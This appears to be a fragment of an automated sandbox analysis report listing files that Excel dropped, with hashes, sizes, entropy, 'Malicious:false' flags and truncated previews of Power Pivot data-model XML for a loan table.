                                                                                                SSDEEP:192:oIDkwYWKzDSTnKjivTnKjBD1FrTWWKzDSTnKjivTnKjBDtFrhN:lKWKWKxVKWKWK5D
                                                                                                MD5:63C024137FB3B293D7BB34A3A89A6F4F
                                                                                                SHA1:3F1E69388E3493173A61AF8407363CF089C22904
                                                                                                SHA-256:8DCDEE34221BABF26EF8ECF86975114E16BF2410F1B39AB38958D2D6C6EA5AB7
                                                                                                SHA-512:B378C06975BD66CB77BBEA3BE43E06CA7831F5B6939D1B0AE6D58972EFC47DFB4E8D1CB7F536171BF7367FCD7FBFF82B64B0861928134ABC959177B41E6A8472
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Year)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">14</Records><RecordsPerSegment xsi:type="xsd:long">11</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segment
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (5019), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):5019
                                                                                                Entropy (8bit):5.1453213254807695
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:ENfzvwMckwYWKggD0LXTnKjiDLXTnKjBDfFrAmN:OIMckwYWKzDUTnKjivTnKjBDfFrhN
                                                                                                MD5:01F64A0B558235370FF8C60B61686665
                                                                                                SHA1:FF21296406F24026FE4A2C4F403A760732C7B39E
                                                                                                SHA-256:C7F32914950BC9D536C7D72D237A56F42E8688DE9A26F5E645990B566EC20712
                                                                                                SHA-512:25B69593220464BE9FFD56000CE44994C5A5F87DF18960CE038D2226CFA77E11F185F1EB1C9F339BC9B9ABC37B071DDA274FBC42DEDE70AD27737333F76AE2AA
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (10581), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):10581
                                                                                                Entropy (8bit):5.132956570141762
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:YIykwYWKzDoTnKjioTnKjixTnKjBDlFr4WWKzDoTnKjioTnKjixTnKjBDdFrGN:UKcKFK8K9SKcKFK8KVk
                                                                                                MD5:074BA86ACD1AA2A736DF1B7B5835EB68
                                                                                                SHA1:9B35C955139C6F384F5AB945F1A07A2F643B337F
                                                                                                SHA-256:360E984898D02C37D4B6C5F875BC11C1F089CD8C3AFEDE892A3C745FC481F32C
                                                                                                SHA-512:8145D0770DA607B204D1217C9854C9065C4C3B998F8379D95D051E6EF9C6CE34D28C57271AE0AB3D23A5F2A7391133A81A78DBCE86671A31D8CDC111FEE4E299
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">3</Segments><Records xsi:type="xsd:long">5</Records><RecordsPerSegment xsi:type="xsd:long">2</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize xsi:type=
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8672), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8672
                                                                                                Entropy (8bit):5.141963163639877
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:AIMckwYWKzDUTnKjivTnKjBD9FrTWWKzDUTnKjivTnKjBDVFrhN:9K4KWKNVK4KWKlD
                                                                                                MD5:B3064A665766429AE7FA87AA3D8270B4
                                                                                                SHA1:C8EA998E366A4A634A53486BB8B6CF8FDA78F6DE
                                                                                                SHA-256:1F676741368A2923D483E6061BEFC459312CF940FE5DB71A1263ECB98B03C78B
                                                                                                SHA-512:651C4495FBA856975D3082B9B6535E8FAA821CC61942519B0C47006DEF13819C39E5CE18DF744DCADB21665096D3B003F4332AE017DF7E5E414193E0DBD98E90
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Pmt No" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize xsi:ty
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8681), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8681
                                                                                                Entropy (8bit):5.1407745904201
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:AIMckwYWKzDUTnKjivTnKjBD9FrTWWKzDUTnKjivTnKjBDVFrhN:9K4KWKtVK4KWKFD
                                                                                                MD5:9910E02F15E39AB29D0C706E1CB55EE2
                                                                                                SHA1:62F0A2654E01897068230FC49628325D2D32FBFD
                                                                                                SHA-256:D5FDEEAAC67168818C2681DC85EBCF7CCDEF898AA0E99513475A69A66AFE9E6D
                                                                                                SHA-512:49E2CA3FD31E1BE47872FCB2364A5B59020D7BCC4B3515F0B3BA5934EECCC2E740B6ABF825B71121EA032DAAA28EE229FA5A2721CFFB21CA7B3BF89FB29425D5
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Principal" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">0</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize xsi
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (64599), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):64599
                                                                                                Entropy (8bit):5.165256842747642
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:OAjKKOj4QjEKYjDxjKKOjCtKzKhKlyjyKOjnajyKOjP3jyKOjZFKuKyKDojdKijf:OgHfApx4Wghxj
                                                                                                MD5:D93A4684BEA8EE34FE6FB9C73BC03A39
                                                                                                SHA1:E801E80EFFAE16A10BC5BD1EF8A77E79DF7889F2
                                                                                                SHA-256:E0F686F17BE40DA51F9C5FB964E2708832587902AFA7E6D187D1E9D9DCC74F5E
                                                                                                SHA-512:A5F61B0ACC1373A5F465739595891953FCD6764713576A2C5090ED1661BDDF178AFDE51CEEE7B1C14B15F3CC720031F47B8ABA80F2DE267A22335776D107854D
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="Loan" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">21</Version><Settings xsi:type="xsd:long">4097</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMMultiPartSegmentMap" ProviderVersion="0"><Properties><FirstPartitionRecordCount xsi:type="xsd:long">0</FirstPartitionRecordCount><FirstPartitionSegmentCount xsi:type="xsd:long">0</FirstPartitionSegmentCount></Properties><Collections><Collection><Name>Partitions</Name><XMObject class="XMSegment1Map" ProviderVersion="0"><Properties><Records xsi:type="xsd:long">360</Records></Properties></XM
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (6150), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):6150
                                                                                                Entropy (8bit):5.043108582202338
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:tDLjZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZk:tDLN+N+N+N+N+N+N+N+N+N+N+Nk
                                                                                                MD5:7D1678433245EC05776715BAD2F149A4
                                                                                                SHA1:7F843EF3D86EC6397E893E245385CF654275C9BB
                                                                                                SHA-256:C81B36E3CBE12137D9F2EF62376CD4C0849005537764E7633B0C08150C29F315
                                                                                                SHA-512:1025EE2F3D279CC4CCA9D59F4B624426E1A1A9DA6D99B5B82817000CA4E2555C8BBAA2A31A58484A19DB95CFBBE475805D9643E1F4ECEC10E91137C805B18B4C
                                                                                                Malicious:false
                                                                                                Preview:<Dimension xmlns="http://schemas.microsoft.com/analysisservices/2003/ext" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><DataVersion>21</DataVersion><IndexVersion>21</IndexVersion><DecodeStoreVersion>-1</DecodeStoreVersion><LevelStoreVersion>-1</LevelStoreVersion><Properties><Property><ParentChild>false</ParentChild><MapDataset><m_cbOffsetHeader>9223372036854775808</m_cbOffsetHeader><m_cbOffsetData>9223372036854775808</m_cbOffsetData><m_cRecord>0</m_cRecord><m_cSegment>0</m_cSegment><m_mskFormat>269484288</m_mskFormat><m_cbHeader>0</m_cbHeader><m_cPath>0</m_cPath><m_cData>0</m_cData><m_cSegmentIndex>4294967295</m_cSegmentIndex><MapDataIndices/><MinMaxValues/></MapDataset><Depth>0</Depth><Balanced>false</Balanced><HasHoles>false</HasHoles></Property><Property><ParentChild>false</ParentChild><MapDataset><m_cbOffsetHeader>9223372036854775808</m_cbOffsetHeader><m_cbOffsetData>9223372036854775808</m_cbOffsetData><m_cRecord>0</m_cRecord><m
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (13986), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):39181
                                                                                                Entropy (8bit):5.222077368585785
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:78K3c2+4c2+kc2+Uc2+7c2+cc2+9c2+Vn2+UQTQfQJQ9Q7QTQlQrQTQWc2+Qc2+B:7/QTQfQJQ9Q7QTQlQrQTQP7S5ZqB
                                                                                                MD5:2C4239F787F85843717B310DC74E5676
                                                                                                SHA1:B2729F8C7FBF0B22DB0B17D90348C5DB2A312C7C
                                                                                                SHA-256:2313BA098258949724427AB15B09F82010543F7845E5FA28B1B6DE7978A1A35F
                                                                                                SHA-512:E055EB80DEBC7910305924EA9A9081436458079DFE33F4005D7FF8BAA350A300913C21802AF70EFA49D1ACBF02843199EB123D5CB0AFC6ED0F4A69A614532163
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (5428), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8608
                                                                                                Entropy (8bit):5.1201328604428005
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:xI+07C4/qjlLN1OGX2QOGX2TOGX2yOGX26OGX2cOGX2BOGX2kwOGG2yOGX2jOGX8:7NLXOGX2QOGX2TOGX2yOGX26OGX2cOGK
                                                                                                MD5:C1CD3D917541DC1E2CD943A64CB4E8E9
                                                                                                SHA1:4431EDB56167C701FEF5C680A3CEEF58D5DDF9B0
                                                                                                SHA-256:87584721921C4FD2A71A86A4A80FE346B3BA1B077BCB1A9F7918DF7FADBB79A1
                                                                                                SHA-512:B739A1E9485465198DFA8B86142ADC71E427E34EECE5F5B46087538829F529D0AA8F995886DDA65859A59677BF427822544E9D4512988D15036DA903DAB5D9B5
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (7774), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):7774
                                                                                                Entropy (8bit):5.177591793358506
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:07vexwKUYp0i4nq+0Bhxu4ECRwy9u/KUdxrM+80QMTD5suNkrkrQhrfrBybzuvAk:xI+RE1y9iV8a2Suv5
                                                                                                MD5:4D2A4466553E44D4B42D909BAB4AACF5
                                                                                                SHA1:A18A747916C200EC5C93E425B03E6C55436FDFB5
                                                                                                SHA-256:D6AB6CBB2DD2F888CFCCCFF766FD31F106077E9790C3585007E1E85CA9930C70
                                                                                                SHA-512:CD190DDC73E5C8192EF48FC626AF80641EC588F7B1AAFE694A75E9E6A8411E52F9F5C9E234BC6A2116F8F8653D0F5F602872C2EEB25A7B7E3353EDFE23642631
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (3105), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3105
                                                                                                Entropy (8bit):5.213440899690661
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:07vexwKUYbVboitqnq+0Bhu8lIaeaTGAAw48UpWypzhJGJdAJQAJw/nJj/nJcREK:07vexwKUYp0i4nq+0BhxIklAjp+bDuuQ
                                                                                                MD5:06EDAA7127285A4CA21F4A7519BAF7FA
                                                                                                SHA1:598CEB111C4FBCF6D3CB4C19F0761675321069DD
                                                                                                SHA-256:85B85A210D305A2B4C56849493F5ABF61A7A148D37B6F74E4A94E2B94FC905F4
                                                                                                SHA-512:3A25E06BE78F93F1C0038D64DDD92AC30C281EB710AD85141B25E00FBEC6366936A25D3C2E1FFF72F402F5BDC6EA9BF97D72C8672A1C58500B5F16FBBC131E1C
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (405), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):405
                                                                                                Entropy (8bit):4.993288092656503
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:C4+DnFro8i9xTDyAGTrPQkQDQf1gwP7k9FD9FwJ:C4+Bo8SCAGXZF7AA
                                                                                                MD5:72DB76B454A91BB3D962E5A79267C8FD
                                                                                                SHA1:99A5E278FBEB416D2531A13CDDF389DDDAE0AD25
                                                                                                SHA-256:37FF7B0F1A46AED4F653EA274F583903E9884803AD97C0566EC08B8BBCE07442
                                                                                                SHA-512:9766D1AE7F50E8658520909A036A66FD7395D51F5F1F05B74358EC774527B7047BE1DB7D14E4DFD1EC447E0D67AD87568384442309AC0C6B9C619EF9E52A5951
                                                                                                Malicious:false
                                                                                                Preview:<Partition xmlns="http://schemas.microsoft.com/analysisservices/2003/ext" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><DataVersion>26</DataVersion><RigidAggVersion>-1</RigidAggVersion><FlexAggVersion>-1</FlexAggVersion><DataIndexVersion>-1</DataIndexVersion><RigidIndexVersion>-1</RigidIndexVersion><FlexIndexVersion>-1</FlexIndexVersion></Partition>
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (2467), with CRLF, LF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):15807
                                                                                                Entropy (8bit):5.0945374228799825
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:xI+K+FClC0YCndOYCnpuYCnF/yanb6anbfanbqanbEanp:7/S/b3bobnbFp
                                                                                                MD5:81F1362E788696B9D32171B838B92FCD
                                                                                                SHA1:F7B83D4C010F6E810542F2692D10D61B96FE35F8
                                                                                                SHA-256:993BF6EB985E0F158C2BA8CD89BE0640C684F6FFA19F5428340F3D1BFA80A761
                                                                                                SHA-512:93BBC9D42A27E6514F7946CA50F3A7578AB87FF2AA1F18CD788F1A14020408963C685ED74BE7C9BE66408E3EAC2B3FA81FF21DF9FC272D1FF02863F3F12F0DBD
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):169
                                                                                                Entropy (8bit):4.934836367190815
                                                                                                Encrypted:false
                                                                                                Malicious:false
                                                                                                Preview:<Cube xmlns="http://schemas.microsoft.com/analysisservices/2003/ext" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"/>
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (3041), with CRLF, LF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3873
                                                                                                Entropy (8bit):5.130897503481441
                                                                                                Encrypted:false
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8705), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8705
                                                                                                Entropy (8bit):5.142542744053374
                                                                                                Encrypted:false
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Beginning Balance" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segment
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8699), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8699
                                                                                                Entropy (8bit):5.143230873720358
                                                                                                Encrypted:false
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Ending Balance" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSi
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8678), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8678
                                                                                                Entropy (8bit):5.139777538262371
                                                                                                Encrypted:false
                                                                                                Malicious:false
